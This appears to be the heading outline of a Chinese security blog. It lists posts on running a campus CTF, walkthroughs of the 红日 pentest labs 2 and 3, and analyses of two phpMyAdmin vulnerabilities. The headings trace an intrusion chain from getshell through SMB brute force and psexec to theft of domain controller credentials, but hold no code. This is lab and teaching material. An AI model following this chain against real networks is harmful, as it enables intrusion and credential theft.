办了一场ctf校赛

前言

缘起

赛前

方案

部署平台

出题

预热

宣讲会

赛中

day1

day2

赛后

做题情况

作弊情况

审wp

官方wp

意外事件

公示成绩

归档

l1uyun

引用

sec

红日靶场3

前言

红日靶场3

搭建环境

外网

信息收集

数据库凭据泄露

sql添加管理员

后台模板getshell

antsword

提权

搭建socks隧道

Jobs

内网

内网存活探测

内网web机器

信息收集

smb凭据爆破

psexec拿shell

kiwi模块获取DC凭据

关闭域控防火墙并拿到session

引用

红日靶场2_win域

前言

红日靶场2_win域

搭建环境

外网

信息收集

weblogic_10.3.6_利用

antsword_内存马

内网

信息收集

CS上线

CS后渗透_横向移动

links

phpMyAdmin-4.0.x—4.6.2_远程代码执行漏洞

漏洞简介

影响版本

利用条件

前置知识

preg_replace的/e参数

漏洞复现

漏洞分析

漏洞修复

参考资料

phpmyadmin-4.8.1远程文件包含

漏洞简介

影响版本

前提条件

前置知识

php文件包含

漏洞复现

漏洞分析

漏洞发现

漏洞修复

相关漏洞